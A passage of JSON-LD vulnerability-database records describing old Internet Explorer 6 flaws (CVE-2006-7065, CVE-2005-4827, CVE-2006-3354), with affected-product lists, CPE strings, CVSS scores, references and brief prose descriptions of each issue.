"title": "Internet Explorer",
"trust": 0.8,
"url": "http://windows.microsoft.com/en-us/internet-explorer/downloads/ie"
},
{
"title": "Microsoft Internet Explorer Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=157784"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-7065"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/19364"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0163.html"
},
{
"trust": 1.7,
"url": "http://www3.ca.com/be/securityadvisor/vulninfo/vuln.aspx?id=34511"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-7065"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-7065"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/windows/ie/default.mspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-03-02T00:00:00",
"db": "VULHUB",
"id": "VHN-23173"
},
{
"date": "2006-08-06T00:00:00",
"db": "BID",
"id": "19364"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"date": "2007-03-02T21:18:00",
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"date": "2007-03-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-23173"
},
{
"date": "2016-07-06T14:40:00",
"db": "BID",
"id": "19364"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"date": "2021-07-23T15:06:35.703000",
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer 6 and 7 Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
],
"trust": 0.6
}
}
VAR-200512-0322
Vulnerability from variot - Updated: 2023-12-18 13:21
Internet Explorer 6.0, and possibly other versions, allows remote attackers to bypass the same origin security policy and make requests outside of the intended domain by calling open on an XMLHttpRequest object (Microsoft.XMLHTTP) and using tab, newline, and carriage return characters within the first argument (method name), which is supported by some proxy servers that convert tabs to spaces. NOTE: this issue can be leveraged to conduct referer spoofing, HTTP Request Smuggling, and other attacks. Microsoft Internet Explorer is prone to a weakness that permits the injection of arbitrary HTTP requests due to improper verification of parameters passed to XmlHttpRequest. An attacker may craft a website that instantiates the affected control and forces the browser to request a site on the same host (or another host in case a forwarding proxy is employed). The attacker would then intercept the response and steal sensitive data to aid in further attacks.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200512-0322",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windowsxp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:microsoft_windows_server_2003_sp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-4827"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery is credited to Amit Klein.",
"sources": [
{
"db": "BID",
"id": "14969"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.9
},
"cve": "CVE-2005-4827",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-16035",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-4827",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200512-877",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-16035",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Internet Explorer 6.0, and possibly other versions, allows remote attackers to bypass the same origin security policy and make requests outside of the intended domain by calling open on an XMLHttpRequest object (Microsoft.XMLHTTP) and using tab, newline, and carriage return characters within the first argument (method name), which is supported by some proxy servers that convert tabs to spaces. NOTE: this issue can be leveraged to conduct referer spoofing, HTTP Request Smuggling, and other attacks. Microsoft Internet Explorer is prone to a weakness that permits the injection of arbitrary HTTP requests due to improper verification of parameters passed to XmlHttpRequest. \nAn attacker may craft a website that instantiates the affected control and forces the browser to request a site on the same host (or another host in case a forwarding proxy is employed). The attacker would then intercept the response and steal sensitive data to aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "VULHUB",
"id": "VHN-16035"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-4827",
"trust": 2.0
},
{
"db": "BID",
"id": "14969",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-16035",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"id": "VAR-200512-0322",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:21:05.735000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-4827"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/14969"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/411585"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/459172/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2007/feb/0081.html"
},
{
"trust": 0.3,
"url": "/archive/1/411585"
},
{
"trust": 0.3,
"url": "/archive/1/459172"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-16035"
},
{
"date": "2005-09-24T00:00:00",
"db": "BID",
"id": "14969"
},
{
"date": "2005-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"date": "2005-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-16035"
},
{
"date": "2015-05-12T19:52:00",
"db": "BID",
"id": "14969"
},
{
"date": "2021-07-23T15:04:41.580000",
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer XmlHttpRequest Parameter validation vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.6
}
}
VAR-200607-0093
Vulnerability from variot - Updated: 2023-12-18 12:47
Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Filter property of an ADODB.Recordset ActiveX object to certain values multiple times, which triggers a null dereference. Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'ADODB.Recordset Filter Property' COM object. A successful attack may cause the browser to fail due to a null-pointer dereference. Microsoft Internet Explorer is a very popular web browser released by Microsoft. When the properties of the ADODB.Recordset ActiveX object are assigned different values three times, a null pointer dereference is triggered. If a user is tricked into visiting a malicious web page containing malformed ActiveX reference code, IE will crash, resulting in a denial of service.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200607-0093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "18773"
},
{
"db": "NVD",
"id": "CVE-2006-3354"
},
{
"db": "CNNVD",
"id": "CNNVD-200607-017"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-3354"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
